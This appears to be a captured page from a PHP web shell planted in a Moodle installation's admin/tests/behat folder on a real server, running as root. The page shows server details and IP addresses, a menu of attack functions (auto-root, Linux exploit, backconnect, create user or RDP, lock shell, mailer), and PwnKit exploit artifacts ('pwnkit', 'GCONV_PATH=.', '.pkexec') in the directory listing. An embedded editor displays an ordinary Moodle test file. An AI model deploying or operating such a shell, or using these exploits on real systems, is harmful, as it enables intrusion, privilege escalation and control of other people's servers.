Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
admin /
tests /
behat /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
behat_admin.php
4.86
KB
-rwxrwxrwx
display_short_names.feature
858
B
-rwxrwxrwx
enable_multiple_accounts_use_s...
3.34
KB
-rwxrwxrwx
filter_users.feature
4.47
KB
-rwxrwxrwx
filter_users_settings.feature
9.76
KB
-rwxrwxrwx
invalid_allcountrycodes.featur...
1.41
KB
-rwxrwxrwx
language_settings.feature
1.35
KB
-rwxrwxrwx
manage_tokens.feature
903
B
-rwxrwxrwx
purge_caches.feature
1.27
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
search_areas.feature
1.02
KB
-rwxrwxrwx
set_admin_settings_value.featu...
895
B
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : invalid_allcountrycodes.feature
@core @core_admin Feature: Administrator is warned and when trying to set invalid allcountrycodes value. In order to avoid misconfiguration of the country selector fields As an admin I want to be warned when I try to set an invalid country code in the allcountrycodes field Scenario: Attempting to set allcountrycodes field with valid country codes Given I log in as "admin" And I navigate to "Location > Location settings" in site administration When I set the following administration settings values: | All country codes | CZ,BE,GB,ES | Then I should not see "Invalid country code" Scenario: Attempting to set allcountrycodes field with invalid country code Given I log in as "admin" And I navigate to "Location > Location settings" in site administration When I set the following administration settings values: | All country codes | CZ,BE,FOOBAR,GB,ES | Then I should see "Invalid country code: FOOBAR" Scenario: Attempting to unset allcountrycodes field Given I log in as "admin" And I navigate to "Location > Location settings" in site administration And I set the following administration settings values: | All country codes | CZ,BE,GB,ES | And I navigate to "Location > Location settings" in site administration When I set the following administration settings values: | All country codes | | Then I should not see "Invalid country code"
Close